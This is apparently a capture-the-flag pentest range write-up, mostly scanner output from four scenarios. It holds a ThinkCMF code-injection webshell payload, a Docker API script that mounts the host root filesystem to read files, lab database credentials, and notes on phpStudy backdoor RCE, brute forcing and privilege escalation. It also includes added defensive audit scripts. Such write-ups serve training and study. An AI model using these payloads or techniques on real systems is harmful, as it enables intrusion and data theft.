This post was last updated 196 days ago; the information in it may have developed or changed since.
Too slow, couldn't keep up with host✌'s pace, but a lot better than last year.
Didn't fully finish a single scenario; I've done far too little pentesting.
温故而知新 (Review the old, learn the new)
flag * 2
10.119.37.115:3306 open
10.119.37.115:8080 open
10.119.37.115:7680 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://10.119.37.115:8080 code:200 len:11 title:None
[+] PocScan http://10.119.37.115:8080 poc-yaml-phpstudy-backdoor-rce
- AntSword together with Burp; uploaded a full-featured webshell
192.168.123.66:445 open
192.168.123.66:1433 open
192.168.123.99:445 open
192.168.123.66:139 open
192.168.123.99:139 open
192.168.123.99:135 open
192.168.123.66:135 open
192.168.123.99:3306 open
192.168.123.99:8080 open
[*] alive ports len is: 9
start vulscan
[+] NetInfo:
[*]192.168.123.66
[->]dbserver
[->]10.119.63.244
[->]192.168.123.66
[->]192.168.113.66
[*] WebTitle:http://192.168.123.99:8080 code:200 len:11 title:None
[*] 192.168.123.66 NET\DBSERVER Windows Server 2016 Datacenter 14393
[+] http://192.168.123.99:8080 poc-yaml-phpstudy-backdoor-rce
- config.inc.php
```php
<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 4.6.2 setup script
* Date: Mon, 07 May 2018 10:48:03 +0000
*/
/* Servers configuration */
$i = 0;
/* Server: mssql [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'mssql';
$cfg['Servers'][$i]['host'] = 'mssql';
$cfg['Servers'][$i]['port'] = 3306;
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'yUzu73pd8bS2JJcb';
/* End of servers configuration */
$cfg['blowfish_secret'] = '';
$cfg['DefaultLang'] = 'en';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
?>
```
- Reached the second machine through MSSQL; Cobalt Strike's getsystem escalated to SYSTEM directly
192.168.113.33:139 open
192.168.113.33:53 open
192.168.113.33:88 open
192.168.113.33:80 open
192.168.113.33:464 open
192.168.113.33:445 open
192.168.113.33:135 open
192.168.113.33:389 open
192.168.113.33:593 open
192.168.113.33:636 open
192.168.113.33:3268 open
192.168.113.33:3269 open
192.168.113.33:3389 open
192.168.113.33:5985 open
192.168.113.33:9389 open
192.168.113.33:49692 open
192.168.113.33:49672 open
192.168.113.33:49669 open
192.168.113.33:49668 open
192.168.113.33:49670 open
192.168.113.33:49666 open
192.168.113.33:51491 open
[*] alive ports len is: 22
start vulscan
[+] NetInfo:
[*]192.168.113.33
[->]BDC
[->]192.168.113.33
[->]10.232.180.80
[*] WebTitle:http://192.168.113.33 code:200 len:703 title:IIS Windows Server
[*] WebTitle:http://192.168.113.33:5985 code:404 len:315 title:Not Found
[*] 192.168.113.33 [+]DC NET\BDC Windows Server 2016 Datacenter 14393
[*] 192.168.113.33 (Windows Server 2016 Datacenter 14393)
各显神通 (Each shows their own skills)
flag * 1
10.119.180.229:80 open
10.119.180.229:3389 open
- Brute-forced credentials:
admin/admin888
- ThinkCMF admin backend RCE, CVE-2019-7580
// Add a new category under Category Management; this only works once, otherwise the scenario has to be reset. Because I tested with phpinfo the first time, I ran out of time to submit the flag by a few seconds.
1'=>array(""),eval($_POST["cmd"]),'2
快乐行程 (Happy Journey)
flag * 3
10.119.144.248:22 open
10.119.144.248:3000 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.119.144.248:3000 code:200 len:1746 title:YApi-高效、易用、功能强大的可视化接口管理平台
- YApi RCE through NoSQL injection
```json
{
  "port": "3000",
  "adminAccount": "admin@admin.com",
  "timeout": 120000,
  "db": {
    "servername": "127.0.0.1",
    "DATABASE": "yapi",
    "port": 27017,
    "user": "admin",
    "pass": "123456",
    "authSource": ""
  },
  "mail": {
    "enable": true,
    "host": "smtp.163.com",
    "port": 465,
    "from": "***@163.com",
    "auth": {
      "user": "***@163.com",
      "pass": "*****"
    }
  }
}
```
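Both the phpMyAdmin config.inc.php above and this YApi config.json hand over working database credentials to anyone who can read the file. The following is an added example, not code from the writeup or from either project: a small audit script that parses the two formats and flags plaintext or weak database passwords, a root database user, and an empty blowfish_secret. The sample configs inside it are constructed with placeholder values, and the finding codes and the small weak-password list are my own.

```python
"""Added example (not part of the original writeup): audit phpMyAdmin
config.inc.php and YApi config.json contents for plaintext or weak
database credentials and missing secrets.  The sample configs below are
constructed for this example; their values are placeholders."""
import json
import re

SAMPLE_PHPMYADMIN = """<?php
/* Servers configuration */
$i = 0;
$i++;
$cfg['Servers'][$i]['verbose'] = 'mssql';
$cfg['Servers'][$i]['host'] = 'mssql';
$cfg['Servers'][$i]['port'] = 3306;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'EXAMPLE-PLACEHOLDER';
$cfg['blowfish_secret'] = '';
$cfg['DefaultLang'] = 'en';
?>
"""

SAMPLE_YAPI = """{
  "port": "3000",
  "adminAccount": "admin@admin.com",
  "db": {"servername": "127.0.0.1", "DATABASE": "yapi", "port": 27017,
         "user": "admin", "pass": "123456", "authSource": ""},
  "mail": {"enable": true, "host": "smtp.example.com", "port": 465,
           "auth": {"user": "ops@example.com", "pass": "mail-placeholder"}}
}
"""

# $cfg['Servers'][$i]['user'] = 'root';   -> key=user, val=root
PHP_SERVER_KV = re.compile(
    r"\$cfg\['Servers'\]\[\$i\]\['(?P<key>\w+)'\]\s*=\s*'(?P<val>[^']*)';")
# $cfg['blowfish_secret'] = '';           -> key=blowfish_secret, val=''
PHP_GLOBAL_KV = re.compile(r"\$cfg\['(?P<key>\w+)'\]\s*=\s*'(?P<val>[^']*)';")

# Small built-in list; a real audit would use a breached-password set.
WEAK_PASSWORDS = {"", "123456", "12345678", "root", "admin", "password"}


def parse_phpmyadmin(text):
    """Return (server settings, global settings) for quoted string values."""
    servers = {m["key"]: m["val"] for m in PHP_SERVER_KV.finditer(text)}
    globs = {m["key"]: m["val"] for m in PHP_GLOBAL_KV.finditer(text)}
    return servers, globs


def audit_phpmyadmin(text):
    """Return a list of (code, detail) findings for a config.inc.php body."""
    servers, globs = parse_phpmyadmin(text)
    findings = []
    if servers.get("password"):
        findings.append(("PLAINTEXT_DB_PASSWORD",
                         "password for user %r stored in the file" % servers.get("user")))
    if servers.get("auth_type") == "config":
        findings.append(("DB_AUTH_TYPE_CONFIG",
                         "auth_type=config logs every visitor in with the stored credentials"))
    if servers.get("user") == "root":
        findings.append(("DB_ROOT_USER", "phpMyAdmin connects as the database root user"))
    if "password" in servers and servers["password"] in WEAK_PASSWORDS:
        findings.append(("WEAK_DB_PASSWORD", "password is empty or on the weak list"))
    if globs.get("blowfish_secret", "") == "":
        findings.append(("EMPTY_BLOWFISH_SECRET", "cookie-auth secret is not set"))
    return findings


def audit_yapi(text):
    """Return (code, detail) findings for a YApi config.json body."""
    cfg = json.loads(text)
    db = cfg.get("db", {})
    findings = []
    if db.get("pass", "") in WEAK_PASSWORDS:
        findings.append(("MONGO_WEAK_PASSWORD", "db.pass is empty or on the weak list"))
    mail = cfg.get("mail", {})
    if mail.get("enable") and mail.get("auth", {}).get("pass"):
        findings.append(("MAIL_PLAINTEXT_PASSWORD", "SMTP password stored in plaintext"))
    return findings


if __name__ == "__main__":
    for name, report in (("phpMyAdmin", audit_phpmyadmin(SAMPLE_PHPMYADMIN)),
                         ("YApi", audit_yapi(SAMPLE_YAPI))):
        for code, detail in report:
            print("[%s] %s: %s" % (name, code, detail))
```

Run it over a real deployment's config files (read the file contents and pass them to the two audit functions) as part of a build or host-hardening check; the point is that the credentials these scenarios chained on were sitting in world-readable application config on the first box.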
- sudo -i to escalate privileges
192.168.99.77:22 open
192.168.99.77:2375 open
192.168.99.72:22 open
192.168.99.72:3000 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://192.168.99.72:3000 code:200 len:1746 title:YApi-高效、易用、功能强大的可视化接口管理平台
[*] WebTitle: http://192.168.99.77:2375 code:404 len:29 title:None
[+] http://192.168.99.77:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://192.168.99.77:2375 poc-yaml-go-pprof-leak
- Unauthenticated Docker API; popped a shell via a scheduled task
```python
import docker

# Connect to the daemon exposed on plain TCP port 2375 (no TLS, no client authentication)
client = docker.DockerClient(base_url='http://192.168.99.77:2375/')
# Start a throwaway container with the host's / bind-mounted at /tmp and read the flag through it
data = client.containers.run('alpine:latest',
                             r'''cat /tmp/root/flag''',
                             remove=True, volumes={'/': {'bind': '/tmp', 'mode': 'rw'}})
print(data.decode())
```
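The run above works only because the daemon listens on plain TCP without TLS client verification and lets any caller bind-mount the host's / into a container. As an added example from the defender's side (not code from the writeup or from Docker), the script below audits constructed docker-inspect-style records and a constructed daemon.json for exactly those conditions: TCP listeners without tlsverify, bind mounts of sensitive host paths, privileged containers, and host PID or network namespaces. The container records, daemon.json contents, sensitive-path list and finding codes are all my own assumptions.

```python
"""Added example (not part of the original writeup): audit Docker container
inspect records and the daemon's daemon.json for the conditions the
unauthenticated-API path relies on.  The records below are constructed
samples in the shape of `docker inspect` / daemon.json, not real data."""
import json

# Host paths that should never be bind-mounted into an ordinary container.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock")

# Constructed inspect-style records.  The first mirrors the run in the
# writeup (host / mounted at /tmp); the second is a benign read-only mount.
SAMPLE_CONTAINERS = [
    {"Id": "aaaa", "Name": "/nervous_example", "Config": {"Image": "alpine:latest"},
     "HostConfig": {"Binds": ["/:/tmp:rw"], "Privileged": False,
                    "PidMode": "", "NetworkMode": "default"},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/tmp"}]},
    {"Id": "bbbb", "Name": "/app", "Config": {"Image": "nginx:1.25"},
     "HostConfig": {"Binds": ["/srv/app/data:/data:ro"], "Privileged": False,
                    "PidMode": "", "NetworkMode": "bridge"},
     "Mounts": [{"Type": "bind", "Source": "/srv/app/data", "Destination": "/data"}]},
]

# Constructed daemon.json contents: one exposes the API on TCP with no TLS
# verification, the other requires client certificates.
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SAFE_DAEMON_JSON = ('{"hosts": ["tcp://0.0.0.0:2376"], "tlsverify": true, '
                    '"tlscacert": "/etc/docker/ca.pem"}')


def is_sensitive_path(src):
    """True if src is a sensitive host path or lies underneath one."""
    if src in SENSITIVE_HOST_PATHS:
        return True
    return any(src.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def mount_sources(record):
    """Collect host-side sources from both HostConfig.Binds and Mounts."""
    sources = set()
    for bind in record.get("HostConfig", {}).get("Binds") or []:
        sources.add(bind.split(":", 1)[0])      # "host:container[:mode]"
    for m in record.get("Mounts") or []:
        if m.get("Type") == "bind" and m.get("Source"):
            sources.add(m["Source"])
    return sources


def audit_container(record):
    """Return (code, detail) findings for one inspect record."""
    hc = record.get("HostConfig", {})
    findings = []
    for src in sorted(mount_sources(record)):
        if is_sensitive_path(src):
            findings.append(("SENSITIVE_BIND", "%s mounted from host" % src))
    if hc.get("Privileged"):
        findings.append(("PRIVILEGED", "container runs with --privileged"))
    if hc.get("PidMode") == "host":
        findings.append(("HOST_PID", "shares the host PID namespace"))
    if hc.get("NetworkMode") == "host":
        findings.append(("HOST_NET", "shares the host network namespace"))
    return findings


def audit_daemon_config(text):
    """Flag TCP listeners in daemon.json that lack TLS client verification."""
    cfg = json.loads(text)
    findings = []
    for h in cfg.get("hosts", []):
        if h.startswith("tcp://") and not cfg.get("tlsverify"):
            findings.append(("UNAUTH_TCP_API", "%s without tlsverify" % h))
    return findings


if __name__ == "__main__":
    for code, detail in audit_daemon_config(SAMPLE_DAEMON_JSON):
        print("daemon:", code, detail)
    for rec in SAMPLE_CONTAINERS:
        for code, detail in audit_container(rec):
            print(rec["Name"], code, detail)
```

On a live host the records would come from `docker inspect` output (or the SDK's `client.containers.list()` with each container's `attrs`) and the daemon config from /etc/docker/daemon.json; a container whose only purpose is to mount / and read files is exactly the kind of short-lived SENSITIVE_BIND hit worth alerting on.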
[*] WebTitle: http://192.168.66.105:2375 code:404 len:29 title:None
[*] WebTitle: http://192.168.66.33:9200 code:200 len:538 title:None
[+] http://192.168.66.105:2375 poc-yaml-docker-api-unauthorized-rce
[+] http://192.168.66.33:9200 poc-yaml-elasticsearch-unauth
[+] http://192.168.66.105:2375 poc-yaml-go-pprof-leak
yellow open internal d8YjxF5wTm2RaL9Fv6CqYw 1 1 1 0 6.5kb 6.5kb
yellow open casa rjR1j0FcRwWcOXb0H2L6lg 1 1 0 0 208b 208b
yellow open test eNK-IjwKSgi54wZkC5vOJQ 1 1 1 0 3.8kb 3.8kb
yellow open service uGUsn9D3R-uYiZFIa3CCww 1 1 46 0 53kb 53kb
yellow open my_index 6hHWlnRqQSSxzIUl0_arDg 1 1 1 0 4.7kb 4.7kb
yellow open minio SssNCb_sQ62yJgj26YwfMQ 1 1 4 0 12.2kb 12.2kb
yellow open api qffhtqNHRHakTOGAEx9Pew 1 1 2 0 9.2kb 9.2kb
- A private key is present at /root/.ssh/id_rsa; used it to SSH straight into the third machine
192.168.0.53:445 open
192.168.0.53:139 open
192.168.0.53:135 open
[*] alive ports len is: 3
start vulscan
[*] NetBios 192.168.0.53 WORKGROUP\DESKTOP-4GEUECL
[*] NetInfo
[*]192.168.0.53
[->]DESKTOP-4GEUECL
[->]192.168.0.53
[->]10.223.61.201
- Found several username/password pairs in the unauthenticated Elasticsearch; brute-forced RDP on the fourth machine with them
多年前的约定 (A Promise Made Years Ago)
flag * 1
10.119.58.123:111 open
10.119.58.123:22 open
10.119.58.123:9876 open
10.119.58.123:10911 open
10.119.58.123:10912 open
10.119.58.123:10909 open
- CVE-2023-33246
192.168.17.77:593 open
192.168.17.77:465 open
192.168.17.77:25 open
192.168.17.77:443 open
192.168.17.77:587 open
192.168.17.77:444 open
192.168.17.77:445 open
192.168.17.77:135 open
192.168.17.77:475 open
192.168.17.77:477 open
192.168.17.77:476 open
192.168.17.77:53 open
192.168.17.77:464 open
192.168.17.77:139 open
192.168.17.77:88 open
192.168.17.77:80 open
192.168.17.77:81 open
192.168.17.77:717 open
192.168.17.77:636 open
192.168.17.77:389 open
192.168.17.77:808 open
192.168.17.77:890 open
192.168.17.77:1801 open
192.168.17.77:2107 open
192.168.17.77:2103 open
192.168.17.77:2105 open
192.168.17.77:2525 open
192.168.17.77:3268 open
192.168.17.77:3269 open
192.168.17.77:3389 open
192.168.17.77:3803 open
192.168.17.77:3800 open
192.168.17.77:3801 open
192.168.17.77:3843 open
192.168.17.77:3823 open
192.168.17.77:3828 open
192.168.17.77:3875 open
192.168.17.77:3867 open
192.168.17.77:3863 open
192.168.17.77:5060 open
192.168.17.77:5062 open
192.168.17.77:5065 open
192.168.17.77:5985 open
192.168.17.77:6001 open
192.168.17.77:6034 open
192.168.17.77:6042 open
192.168.17.77:6083 open
192.168.17.77:6402 open
192.168.17.77:6407 open
192.168.17.77:6409 open
192.168.17.77:6405 open
192.168.17.77:6406 open
192.168.17.77:6403 open
192.168.17.77:6400 open
192.168.17.77:6401 open
192.168.17.77:6412 open
192.168.17.77:6419 open
192.168.17.77:6428 open
192.168.17.77:6453 open
192.168.17.77:6469 open
192.168.17.77:6472 open
192.168.17.77:6481 open
192.168.17.77:6480 open
192.168.17.77:6483 open
192.168.17.77:6482 open
192.168.17.77:6486 open
192.168.17.77:6494 open
192.168.17.77:6497 open
192.168.17.77:6502 open
192.168.17.77:6509 open
192.168.17.77:6522 open
192.168.17.77:6529 open
192.168.17.77:6532 open
192.168.17.77:6546 open
192.168.17.77:6547 open
192.168.17.77:6556 open
192.168.17.77:6559 open
192.168.17.77:6586 open
192.168.17.77:6587 open
192.168.17.77:6598 open
192.168.17.77:6608 open
192.168.17.77:6680 open
192.168.17.77:6682 open
192.168.17.77:6691 open
192.168.17.77:6693 open
192.168.17.77:7227 open
192.168.17.77:8172 open
192.168.17.77:9389 open
192.168.17.77:9710 open
192.168.17.77:13634 open
192.168.17.77:22366 open
192.168.17.77:22367 open
192.168.17.77:22389 open
192.168.17.77:22408 open
192.168.17.77:22418 open
192.168.17.77:22423 open
192.168.17.77:22462 open
192.168.17.77:22494 open
192.168.17.77:35384 open
192.168.17.77:35399 open
192.168.17.77:47001 open
192.168.17.77:64327 open
192.168.17.77:64337 open
[*] alive ports len is: 103
start vulscan
[*] WebTitle http://192.168.17.77:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle http://192.168.17.77:3800 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.17.77:5985 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.17.77 code:403 len:0 title:None
[*] WebTitle http://192.168.17.77:47001 code:404 len:315 title:Not Found
[*] NetBios 192.168.17.77 [+] DC:owa.ctfsec.local Windows Server 2016 Datacenter 14393
[*] OsInfo 192.168.17.77 (Windows Server 2016 Datacenter 14393)
[*] WebTitle https://192.168.17.77 code:302 len:0 title:None 跳转url: https://192.168.17.77/owa/
[*] WebTitle https://192.168.17.77:8172 code:404 len:0 title:None
[*] WebTitle https://192.168.17.77/owa/auth/logon.aspx?url=https%3a%2f%2f192.168.17.77%2fowa%2f&reason=0 code:200 len:28244 title:Outlook
[*] WebTitle https://192.168.17.77:444 code:500 len:3367 title:运行时错误